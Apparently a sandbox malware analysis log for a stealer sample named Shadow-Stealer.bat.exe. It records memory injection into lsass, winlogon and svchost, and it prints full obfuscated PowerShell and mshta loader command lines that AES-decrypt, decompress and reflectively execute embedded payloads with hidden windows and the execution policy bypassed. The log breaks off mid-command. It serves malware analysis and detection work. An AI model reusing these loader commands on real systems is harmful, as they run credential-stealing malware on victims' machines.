            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 10BF6770000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 30A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016610000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1540000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E428D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B460000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016670000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F15A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E42930000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CAD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF3310000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FDC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA710000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D0166D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1600000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E42990000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CB30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF3370000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA0490000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA770000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDE60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 9D0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D50000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D60000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1050000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: A30000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D70000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D80000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1070000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1400000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D50000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D60000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 9E0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2950000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2900000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: BA0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: A00000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 27D0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: F50000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 930000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 13A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016730000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1660000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E429F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CB90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF33D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA04F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA7D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDEC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2400000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 225966B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E67120000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A510000
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeThread register set: target process: 3940Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeThread register set: target process: 5576Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 1088Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 6336Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 5204Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 3784Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 3268Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 5112Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread register set: target process: 352Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "shadow-stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pxqky($ammuc){ $qaumi=[system.security.cryptography.aes]::create(); $qaumi.mode=[system.security.cryptography.ciphermode]::cbc; $qaumi.padding=[system.security.cryptography.paddingmode]::pkcs7; $qaumi.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('loy14lths3sgwk7zmlm+u1lasbd9l9+grtu5mlzp2mm='); $qaumi.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ls2ypgjebrtrew/fjyl2oq=='); $lsyot=$qaumi.createdecryptor(); $return_var=$lsyot.transformfinalblock($ammuc, 0, $ammuc.length); $lsyot.dispose(); $qaumi.dispose(); $return_var;}function yapup($ammuc){ $bpqpy=new-object system.io.memorystream(,$ammuc); $muxyl=new-object system.io.memorystream; $qrzer=new-object system.io.compression.gzipstream($bpqpy, [io.compression.compressionmode]::decompress); $qrzer.copyto($muxyl); $qrzer.dispose(); $bpqpy.dispose(); $muxyl.dispose(); $muxyl.toarray();}function davur($ammuc,$oapri){ $tirdu=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$ammuc); $cmozy=$tirdu.entrypoint; $cmozy.invoke($null, $oapri);}$agzco=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\shadow-stealer.bat').split([environment]::newline);foreach ($xwgwp in $agzco) { if ($xwgwp.startswith('seroxen')) { $gzelj=$xwgwp.substring(7); break; }}$paqqy=[string[]]$gzelj.split('\');$ahdvx=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[0])));$qbiwj=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[1])));davur $qbiwj (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));davur $ahdvx (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));
            Source: unknownProcess created: C:\Windows\$sxr-mshta.exe c:\windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'vb'+'sc'+'ri'+'pt'+'\x22>'+'se'+'t\x20'+'ob'+'js'+'he'+'ll'+'\x20='+'\x20c'+'re'+'at'+'eo'+'bj'+'ec'+'t('+'\x22w'+'sc'+'ri'+'pt'+'.s'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'sh'+'el'+'l.'+'ru'+'n\x20'+'\x22c:\\windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptouybjvuvgcojtiwn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ $kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnybbv03aq6fif9zugda03cb0yo24aife5afn+zogdlktwrsyyivpjarzdcbblxkhprynayhbm2a5pmzva2gac2+o8odd180z07f5zl3mywto8
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(6400).waitforexit();[system.threading.thread]::sleep(5000); function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ $kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnyb
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "shadow-stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pxqky($ammuc){ $qaumi=[system.security.cryptography.aes]::create(); $qaumi.mode=[system.security.cryptography.ciphermode]::cbc; $qaumi.padding=[system.security.cryptography.paddingmode]::pkcs7; $qaumi.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('loy14lths3sgwk7zmlm+u1lasbd9l9+grtu5mlzp2mm='); $qaumi.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ls2ypgjebrtrew/fjyl2oq=='); $lsyot=$qaumi.createdecryptor(); $return_var=$lsyot.transformfinalblock($ammuc, 0, $ammuc.length); $lsyot.dispose(); $qaumi.dispose(); $return_var;}function yapup($ammuc){ $bpqpy=new-object system.io.memorystream(,$ammuc); $muxyl=new-object system.io.memorystream; $qrzer=new-object system.io.compression.gzipstream($bpqpy, [io.compression.compressionmode]::decompress); $qrzer.copyto($muxyl); $qrzer.dispose(); $bpqpy.dispose(); $muxyl.dispose(); $muxyl.toarray();}function davur($ammuc,$oapri){ $tirdu=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$ammuc); $cmozy=$tirdu.entrypoint; $cmozy.invoke($null, $oapri);}$agzco=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\shadow-stealer.bat').split([environment]::newline);foreach ($xwgwp in $agzco) { if ($xwgwp.startswith('seroxen')) { $gzelj=$xwgwp.substring(7); break; }}$paqqy=[string[]]$gzelj.split('\');$ahdvx=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[0])));$qbiwj=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[1])));davur $qbiwj (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));davur $ahdvx (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));Jump to behavior
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ 